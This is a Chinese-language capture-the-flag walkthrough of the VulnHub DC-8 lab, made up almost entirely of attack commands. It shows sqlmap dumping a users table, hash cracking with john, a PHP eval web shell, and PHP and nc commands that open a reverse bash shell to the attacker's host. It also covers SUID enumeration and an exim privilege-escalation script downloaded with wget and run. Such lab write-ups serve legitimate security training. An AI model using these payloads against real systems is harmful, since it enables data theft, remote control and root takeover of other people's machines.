vulnhub靶场之DC-8靶场实战（超详细）

nmap -A -p- -T4 192.168.111.143

dirsearch -u http://192.168.111.143 -i 200

sqlmap -u "http://192.168.111.143/?nid=1" --batch

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 --dbs
--risk=3 :风险等级，对目标系统安全性要求较低，对速度要求较高，谨慎使用，可能会对系统造成影响（0-3.等级越低，影响越小）
--level=5：测试等级，5级包含的payload最多（1-5.测试等级越高，测试将越全面,)

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db --tables

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users --columns

sqlmap -u "http://192.168.111.143?nid=1" --risk=3 --level=5 -D d7db -T users -C name,pass --dump

touch passwd.txt 新建一个文件
vim passwd.txt 编辑文件内容，将hash之进行存储
john passwd.txt 使用John工具解密

<p>LULU</>
<?php phpinfo();?> 

<?php @eval($_REQUEST[6]);?>

nc -e /bin/bash 192.18.111.128 6666

nc-lvnp 6666

<p>LULU</p>
<?php
system("nc -e /bin/bash 192.168.111.128 1234")
?> 

python -c "import pty;pty.spawn('/bin/bash')"

SUID是一种对二进制程序进行设置的特殊权限，可以让二进制程序的执行者临时拥有属主的权限，若是对一些特殊命令设置了SUID，那么将会有被提权的风险
常用的SUID提权命令有：nmap、vim、find、bash、more、less、nano、cp等。

sudo和SUID的区别
    sudo是给某个用户或者组授予执行某些命令的权限，权限在人身上
    SUID是给命令赋予root用户的权限，权限在命令上

find / -perm -u=s -type f 2>/dev/null

exim4 --version

searchsploit exim 4.89

searchsploit exim 

systemctl start apache2

wget http://192.168.111.128/46996.sh

chmod 777 46996.sh

cat 46996.sh

./46996.sh -m setuid 提权不成功
./46996.sh -m netcat